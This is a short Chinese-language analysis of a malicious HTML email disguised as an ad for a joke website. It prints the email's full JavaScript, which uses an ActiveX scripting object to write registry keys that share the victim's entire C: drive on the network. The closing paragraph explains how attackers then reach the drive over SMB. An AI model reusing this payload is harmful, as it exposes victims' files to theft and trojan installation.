〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉
〈HTML〉〈HEAD〉
〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉
〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉
〈STYLE〉〈/STYLE〉
〈/HEAD〉
〈BODY bgColor=#c0c0c0〉
〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉
〈DIV align=center〉 〈/DIV〉
〈DIV align=left〉〈FONT size=2〉   
你好！我们是笑林广记笑话网，这里有大量的XXX级笑话，绝对笑死你！欢迎访问！附件中有极品笑话N篇，友情赠送！〈A href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉
〈script language=JavaScript〉
function f（）　//改写注册表的函数
{
var aa,ss;
aa=document.applets[0];
aa.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）;
aa.createInstance（）;
ss=aa.GetObject（）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Flags",302,"REG_DWORD"）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Type",0,"REG_DWORD"）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Path","C:\\"）;
}
function init（）
{
setTimeout（"f（）", 1000）;　//每过1000毫秒就再次递归调用f（）
}
init（）;　//调用函数
〈/script〉
〈/BODY〉〈/HTML〉

　　这封邮件就是利用了MS.ActiveX元件的写注册表的功能，只要你一读这封信，它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan中添加了一个键值C$，并且将C盘改为完全共享！这样黑客可以用SMB扫描器直接登陆你的C盘，他可以在硬盘中随意拷贝文件，删除文件，添加文件……并且可以给你上传木马，永久而全面地控制你的机器。